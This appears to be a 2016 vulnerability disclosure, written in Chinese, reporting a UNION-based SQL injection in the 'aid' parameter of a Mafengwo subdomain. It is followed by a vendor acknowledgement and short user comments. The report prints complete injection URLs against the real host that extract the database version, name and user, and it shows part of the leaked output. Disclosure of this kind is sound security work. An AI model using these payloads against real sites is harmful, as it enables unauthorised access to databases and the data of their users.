蚂蜂窝某分站存在SQL注入漏洞(可UNION)

#1 存在漏洞网站

http://activity.mafengwo.cn

#2 注入点

http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1

#3 注入参数

aid=1

# 数据库版本

http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1%20and%201=2%20union%20select%201,2,version(),4,5,6,7,8%23

{"data":"
 /n
 /n
 <//div>/n
 5.5.21-log<//p><//div>/n
 
 <//i>
 7/u7968<//p><//div>/n <//li>/n<//ul>/n","msg":"","code":1}

数据库名

http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1%20and%201=2%20union%20select%201,2,database(),4,5,6,7,8%23

mafengwo

用户名

http://activity.mafengwo.cn/t/travel_mdd_top/v1/list?aid=1%20and%201=2%20union%20select%201,2,user(),4,5,6,7,8%23

强制类型转换

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-04-25 10:06

厂商回复：

非常感谢反馈 ，在处理中

最新状态：

暂无

1. 2016-04-25 10:03 | Dracul ( 路人 | Rank:17 漏洞数:8 | ⊙_⊙)

   0

   沙发

   1# 回复此人

2. 2016-04-25 10:20 | JiuShao ( 普通白帽子 | Rank:495 漏洞数:109 | ╮(╯▽╰)╭锄禾日当午)

   0

   板凳

   2# 回复此人

3. 2016-04-25 10:27 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于，我也是有ID的人了！)

   0

   地板

   3# 回复此人

4. 2016-04-25 10:38 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

   0

   下水道

   4# 回复此人

5. 2016-04-25 10:46 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问，还有谁！！！！！！！！！！！！！...)

   0

   卖辣条

   5# 回复此人

6. 2016-05-03 11:44 | Fencing ( 实习白帽子 | Rank:70 漏洞数:11 | 以后慢慢写)

   0

   猪猪侠也在撸蚂蜂窝，挖偶像~~~

   6# 回复此人